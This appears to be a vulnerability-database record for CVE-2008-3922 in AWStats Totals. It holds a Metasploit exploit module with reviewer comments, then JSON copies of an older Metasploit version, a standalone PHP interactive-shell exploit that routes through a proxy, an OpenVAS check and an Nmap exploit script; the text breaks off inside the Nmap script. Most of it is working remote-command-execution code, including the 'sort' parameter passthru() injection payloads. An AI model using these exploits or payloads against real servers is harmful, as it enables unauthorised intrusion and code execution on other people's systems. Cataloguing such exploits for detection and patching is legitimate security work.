ID MSF:EXPLOIT/UNIX/WEBAPP/AWSTATSTOTALS_MULTISORT
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24
Description
This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals versions v1.0 - v1.14 are vulnerable.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2008-3922 (AWStats Totals v1.0 - v1.14,
# see 'References' below): the value of the `sort` GET parameter of
# awstatstotals.php ends up inside PHP code, so a crafted value runs an
# injected command on the web server.
#
# Contract declared in the metadata hash of #initialize: unprivileged,
# platform 'unix', ARCH_CMD command payloads of at most 512 bytes, a single
# 'Automatic' target. The only user option is URI, the path to awstatstotals.php.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the URI option with the framework.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'AWStats Totals multisort Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary command execution vulnerability in the
        AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
      },
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2008-3922'],
          ['OSVDB', '47807'],
          ['BID', '30856']
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          'Space' => 512,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
            }
        },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Aug 26 2008',
      'DefaultTarget' => 0))

    register_options(
      [
        # Path of the vulnerable script; required, defaults to the stock install layout.
        OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]),
      ])
  end

  # Probes the target by injecting a phpinfo() call through the `sort`
  # parameter (a single GET with a 25 s timeout) and reports Vulnerable when
  # the response body contains the string "localhost".
  #
  # Defender note: the probe's query string carries the literal text
  # `phpinfo()`, so the check is visible in the web server's access log.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the marker is found;
  #   Safe otherwise, including when no response arrives at all
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['URI']),
      'vars_get' =>
      {
        'sort' => '"].phpinfo().exit().$a["'
      }
    }, 25)

    # NOTE(review): /localhost/ is a weak indicator of phpinfo() output — a
    # vulnerable host whose phpinfo page lacks that string is reported Safe,
    # and "no response" is not distinguished from "not vulnerable".
    if (res and res.body.match(/localhost/))
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Delivers the command payload inside a passthru() call via the `sort`
  # parameter and prints whatever the server echoes back between the two
  # literal YYY marker lines.
  #
  # Side effects: one raw GET (25 s timeout, Connection: Close) and console
  # output; there is no meaningful return value.
  def exploit
    # URI-encode the generated command so it survives as a query-string value.
    command = Rex::Text.uri_encode(payload.encoded)
    # The two `echo YYY` statements bracket the command output so it can be
    # extracted from the response below. Defender note: the whole injected
    # value, including `passthru` and the markers, lands in the access log.
    sploit = normalize_uri(datastore['URI']) + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'

    res = send_request_raw({
      'uri' => sploit,
      'method' => 'GET',
      'headers' =>
      {
        'Connection' => 'Close',
      }
    }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")

      # /m lets `.` span newlines; the greedy `.*` captures up to the last
      # "\nYYY" in the body.
      m = res.body.match(/YYY\n(.*)\nYYY/m)

      if (m)
        print_status("Command output from the server:")
        # NOTE(review): m[1] is server-controlled and printed verbatim — a
        # hostile or honeypot server could return terminal escape sequences;
        # consider filtering non-printable bytes before printing.
        print("\n" + m[1] + "\n\n")
      else
        print_status("This server may not be vulnerable")
      end
    else
      print_status("No response from the server")
    end
  end
end
{"id": "MSF:EXPLOIT/UNIX/WEBAPP/AWSTATSTOTALS_MULTISORT", "type": "metasploit", "bulletinFamily": "exploit", "title": "AWStats Totals multisort Remote Command Execution", "description": "This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\n", "published": "2011-05-25T10:42:37", "modified": "2017-11-08T16:00:24", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922"], "cvelist": ["CVE-2008-3922"], "lastseen": "2020-03-15T18:11:04", "viewCount": 69, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2020-03-15T18:11:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3922"]}, {"type": "exploitdb", "idList": ["EDB-ID:6368", "EDB-ID:17324"]}, {"type": "nessus", "idList": ["AWSTATSTOTALS_SORT_REMOTE_EXEC.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101698"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801893"]}, {"type": "dsquare", "idList": ["E-11"]}], "modified": "2020-03-15T18:11:04", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/awstatstotals_multisort.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AWStats Totals multisort Remote Command Execution',\n 'Description' => %q{\n This module exploits an arbitrary command execution vulnerability in the\n AWStats Totals PHP script. 
AWStats Totals version v1.0 - v1.14 are vulnerable.\n },\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2008-3922'],\n ['OSVDB', '47807'],\n ['BID', '30856']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 512,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Aug 26 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The full URI path to awstatstotals.php\", \"/awstatstotals/awstatstotals.php\"]),\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI']),\n 'vars_get' =>\n {\n 'sort' => '\"].phpinfo().exit().$a[\"'\n }\n }, 25)\n\n if (res and res.body.match(/localhost/))\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n command = Rex::Text.uri_encode(payload.encoded)\n sploit = normalize_uri(datastore['URI']) + '?sort=\"].passthru(\\'echo%20YYY;' + command + ';echo%20YYY;\\').exit().%24a[\"'\n\n res = send_request_raw({\n 'uri' => sploit,\n 'method' => 'GET',\n 'headers' =>\n {\n 'Connection' => 'Close',\n }\n }, 25)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n\n m = res.body.match(/YYY\\n(.*)\\nYYY/m)\n\n if (m)\n print_status(\"Command output from the server:\")\n print(\"\\n\" + m[1] + \"\\n\\n\")\n else\n print_status(\"This server may not be vulnerable\")\n end\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:35:16", "description": "awstatstotals.php in AWStats Totals 1.0 through 1.14 allows remote attackers to execute arbitrary code via PHP sequences in the sort parameter, which is used by the multisort function when dynamically creating an anonymous PHP function.", "edition": 4, "cvss3": {}, "published": "2008-09-04T18:41:00", "title": "CVE-2008-3922", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3922"], "modified": "2018-10-11T20:50:00", "cpe": ["cpe:/a:telartis_bv:awstats_totals:1.13", "cpe:/a:telartis_bv:awstats_totals:1.11", "cpe:/a:telartis_bv:awstats_totals:1.0", "cpe:/a:telartis_bv:awstats_totals:1.1", "cpe:/a:telartis_bv:awstats_totals:1.14"], "id": "CVE-2008-3922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3922", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:telartis_bv:awstats_totals:1.14:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.13:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T07:38:26", "description": "AWStats Totals =< v1.14 multisort Remote Command Execution. CVE-2008-3922. 
Webapps exploit for php platform", "published": "2011-05-25T00:00:00", "type": "exploitdb", "title": "AWStats Totals <= 1.14 multisort - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "modified": "2011-05-25T00:00:00", "id": "EDB-ID:17324", "href": "https://www.exploit-db.com/exploits/17324/", "sourceData": "##\r\n# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\t\t\t\t\tAWStats Totals PHP script. 
AWStats Totals version v1.0 - v1.14 are vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12715 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-3922'],\r\n\t\t\t\t\t['OSVDB', '47807'],\r\n\t\t\t\t\t['BID', '30856'],\r\n\t\t\t\t\t['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Aug 26 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"The full URI path to awstatstotals.php\", \"/awstatstotals/awstatstotals.php\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URI'],\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'sort' => '\"].phpinfo().exit().$a[\"'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res and res.body.match(/localhost/))\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tcommand = Rex::Text.uri_encode(payload.encoded)\r\n\t\tsploit = datastore['URI'] + '?sort=\"].passthru(\\'echo%20YYY;' + command + ';echo%20YYY;\\').exit().%24a[\"'\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => sploit,\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\r\n\t\t\t\t'Connection' => 'Close',\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: 
#{res.code} #{res.message}\")\r\n\r\n\t\t\tm = res.body.match(/YYY\\n(.*)\\nYYY/m)\r\n\r\n\t\t\tif (m)\r\n\t\t\t\tprint_status(\"Command output from the server:\")\r\n\t\t\t\tprint(\"\\n\" + m[1] + \"\\n\\n\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"This server may not be vulnerable\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17324/"}, {"lastseen": "2016-02-01T00:44:11", "description": "AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit. CVE-2008-3922. Webapps exploit for php platform", "published": "2008-09-05T00:00:00", "type": "exploitdb", "title": "AWStats Totals awstatstotals.php sort Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "modified": "2008-09-05T00:00:00", "id": "EDB-ID:6368", "href": "https://www.exploit-db.com/exploits/6368/", "sourceData": "<?php\n/* \n * Remote Execution Exploit for AWStats Totals vulnerability (Interactive Shell) Version 2\n * \n * Updated 05/09/08: The exploit now works with magic quotes on or off\n * \n * Author: Ricardo Almeida\n * email: ricardojba[at]aeiou[DoT]pt\n *\n * Greetz\n * The hacker webzine authored by Ronald van den Heetkamp for his code\n *\n * Credits: Vulnerabilities reported by Emory University.\n * http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt \n * \n */ \n\nfunction wrap($url){\n $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');\n $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');\n $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' 
'.rand(1,7).'.'.rand(0,9).'; en-US;)';\n # tor or other proxy\n $tor = '172.20.1.15:8080';\n $timeout = '300';\n $ack = curl_init(); \n curl_setopt ($ack, CURLOPT_PROXY, $tor); \n curl_setopt ($ack, CURLOPT_URL, $url);\n curl_setopt ($ack, CURLOPT_HEADER, 1); \n curl_setopt ($ack, CURLOPT_USERAGENT, $agent); \n curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); \n curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);\n curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);\n $syn = curl_exec($ack);\n $info = curl_getinfo($ack);\n curl_close($ack); \n\n if($info['http_code'] == '200') {\n return $syn;\n die();\n } else {\n return \"Fail! :\".$info['http_code'].\"\\r\\n\";\n }\n}\n\nif ($argc != 3) {die(\"Usage: awtotalhack.php <host> <magic_quotes on or off>\\nEx: awtotalhack.php host.tld on\\n\");}\narray_shift($argv);\n$host = $argv[0];\n$magic = $argv[1];\n\n# Start the interactive shell\nwhile(1){\n fwrite(STDOUT, \"[shell:~ # \");\n if ($magic == \"on\") {\n $c = str_split(trim(fgets(STDIN)));\n if (implode($c) == \"exit\") {die();};\n for($i=0;$i<count($c);$i++) {$c[$i] = \"chr(\".ord($c[$i]).\")\";}\n $cmd = implode(\"%2e\", $c);\n $attackurl = \"http://\".$host.\"/\".\"awstatstotals.php?sort=%7b%24%7bpassthru%28\".$cmd.\"%29%7d%7d%7b%24%7bexit%28%29%7d%7d\";\n echo wrap($attackurl);\n } else if ($magic == \"off\") {\n $cmd = preg_replace('/ /','%20',trim(fgets(STDIN)));\n if ($cmd == \"exit\") {die();};\n $attackurl = \"http://\".$host.\"/\".\"awstatstotals.php?sort=%22%5d%2epassthru%28%27\".$cmd.\"%27%29%2eexit%28%29%2e%24a%5b%22\";\n echo wrap($attackurl);\n }\n}\n?>\n\n# milw0rm.com [2008-09-05]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6368/"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "description": "RCE via sort field\n\nVulnerability Type: Remote Command Execution", "modified": 
"2013-04-02T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-11", "href": "", "type": "dsquare", "title": "Awstats Totals <= 1.14 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-08T19:11:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3922"], "description": "This host is running AWStats Totals and is prone to remote command\n execution vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2011-06-07T00:00:00", "id": "OPENVAS:1361412562310801893", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801893", "type": "openvas", "title": "AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801893\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-07 13:29:28 +0200 (Tue, 07 Jun 2011)\");\n script_cve_id(\"CVE-2008-3922\");\n script_bugtraq_id(30856);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/44712\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17324/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/495770/100/0/threaded\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/101698/awstatstotals_multisort.rb.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary PHP\n commands by constructing specially crafted 'sort' parameters.\");\n\n script_tag(name:\"affected\", value:\"AWStats Totals versions 1.14 and 
prior.\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper validation of user-supplied input passed via\n the 'sort' parameter to 'multisort()' function, which allows attackers to execute arbitrary PHP code.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to AWStats Totals version 1.15 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running AWStats Totals and is prone to remote command\n execution vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nif(!http_can_host_php(port:port)) {\n exit(0);\n}\n\nforeach dir (make_list_unique(\"/awstatstotals\", \"/awstats\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n res = http_get_cache(item: dir + \"/awstatstotals.php\", port:port);\n if(\"<title>AWStats Totals</title>\" >< res)\n {\n url = string(dir, '/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\"');\n\n if(http_vuln_check(port:port, url:url, pattern:'>phpinfo()<',\n extra_check: make_list('>System <', '>Configuration<', '>PHP Core<')))\n {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2019-05-30T17:05:34", "description": "Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922). \n\nThis vulnerability can be exploited through the GET variable `sort`. 
The script queries the web server with the command payload encoded using PHP's chr() function: \n\n`?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}`\n\nCommon paths for Awstats Total: \n\n * `/awstats/index.php`\n * `/awstatstotals/index.php`\n * `/awstats/awstatstotals.php`\n\nReferences: \n\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922\n * http://www.exploit-db.com/exploits/17324/\n\n## Script Arguments \n\n#### http-awstatstotals-exec.uri \n\nAwstats Totals URI including path. Default: /index.php\n\n#### http-awstatstotals-exec.cmd \n\nCommand to execute. Default: whoami\n\n#### http-awstatstotals-exec.outfile \n\nOutput file. If set it saves the output in this file. \n\nOther useful args when running this script: http.useragent - User Agent to use in GET request\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. 
\n\n## Example Usage \n \n \n nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd=\"uname -a\", http-awstatstotals-exec.uri=/awstats/index.php' <target>\n nmap -sV --script http-awstatstotals-exec.nse <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-awstatstotals-exec.nse:\n |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux\n \n\n## Requires \n\n * http\n * io\n * nmap\n * shortport\n * stdnse\n * string\n * table\n\n* * *\n", "edition": 7, "published": "2011-08-23T06:29:12", "title": "http-awstatstotals-exec NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3922"], "modified": "2018-10-18T01:08:19", "id": "NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE", "href": "https://nmap.org/nsedoc/scripts/http-awstatstotals-exec.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14\nand possibly other products based on it (CVE: 2008-3922).\n\nThis vulnerability can be exploited through the GET variable <code>sort</code>.\nThe script queries the web server with the command payload encoded using PHP's\nchr() function:\n\n<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>\n\nCommon paths for Awstats Total:\n* <code>/awstats/index.php</code>\n* <code>/awstatstotals/index.php</code>\n* <code>/awstats/awstatstotals.php</code>\n\nReferences:\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922\n* http://www.exploit-db.com/exploits/17324/\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd=\"uname -a\", 
http-awstatstotals-exec.uri=/awstats/index.php' <target>\n-- nmap -sV --script http-awstatstotals-exec.nse <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-awstatstotals-exec.nse:\n-- |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux\n--\n-- @args http-awstatstotals-exec.uri Awstats Totals URI including path. Default: /index.php\n-- @args http-awstatstotals-exec.cmd Command to execute. Default: whoami\n-- @args http-awstatstotals-exec.outfile Output file. If set it saves the output in this file.\n---\n-- Other useful args when running this script:\n-- http.useragent - User Agent to use in GET request\n--\n\nauthor = \"Paulino Calderon <calderon@websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"intrusive\", \"exploit\"}\n\n\nportrule = shortport.http\n\n--default values\nlocal DEFAULT_CMD = \"whoami\"\nlocal DEFAULT_URI = \"/index.php\"\n\n---\n--Writes string to file\n-- @param filename Filename to write\n-- @param content Content string\n-- @return boolean status\n-- @return string error\n--Taken from: hostmap.nse\nlocal function write_file(filename, contents)\n local f, err = io.open(filename, \"w\")\n if not f then\n return f, err\n end\n f:write(contents)\n f:close()\n return true\nend\n\n---\n--Checks if Awstats Totals installation seems to be there\n-- @param host Host table\n-- @param port Port table\n-- @param path Path pointing to AWStats Totals\n-- @return true if awstats totals is found\nlocal function check_installation(host, port, path)\n local check_req = http.get(host, port, path)\n if not(http.response_contains(check_req, \"AWStats\")) then\n return false\n end\n return true\nend\n\n---\n--MAIN\n---\naction = function(host, port)\n local output = {}\n local uri = stdnse.get_script_args(\"http-awstatstotals-exec.uri\") or DEFAULT_URI\n local cmd = stdnse.get_script_args(\"http-awstatstotals-exec.cmd\") or 
DEFAULT_CMD\n local out = stdnse.get_script_args(\"http-awstatstotals-exec.outfile\")\n\n --check for awstats signature\n local awstats_check = check_installation(host, port, uri)\n if not(awstats_check) then\n stdnse.debug1(\"This does not look like Awstats Totals. Quitting.\")\n return\n end\n\n --Encode payload using PHP's chr()\n local encoded_payload = {}\n cmd:gsub(\".\", function(c) encoded_payload[#encoded_payload+1] = (\"chr(%s)\"):format(string.byte(c)) end)\n local stealth_payload = \"?sort={%24{passthru%28\"..table.concat(encoded_payload,'.')..\"%29}}{%24{exit%28%29}}\"\n\n --set payload and send request\n local req = http.get(host, port, uri .. stealth_payload)\n if req.status and req.status == 200 then\n output[#output+1] = string.format(\"\\nOutput for '%s':%s\", cmd, req.body)\n\n --if out set, save output to file\n if out then\n local status, err = write_file(out, req.body)\n if status then\n output[#output+1] = string.format(\"Output saved to %s\\n\", out)\n else\n output[#output+1] = string.format(\"Error saving output to %s: %s\\n\", out, err)\n end\n end\n\n else\n if nmap.verbosity()>= 2 then\n output[#output+1] = \"[Error] Request did not return 200. Make sure your URI value is correct. 
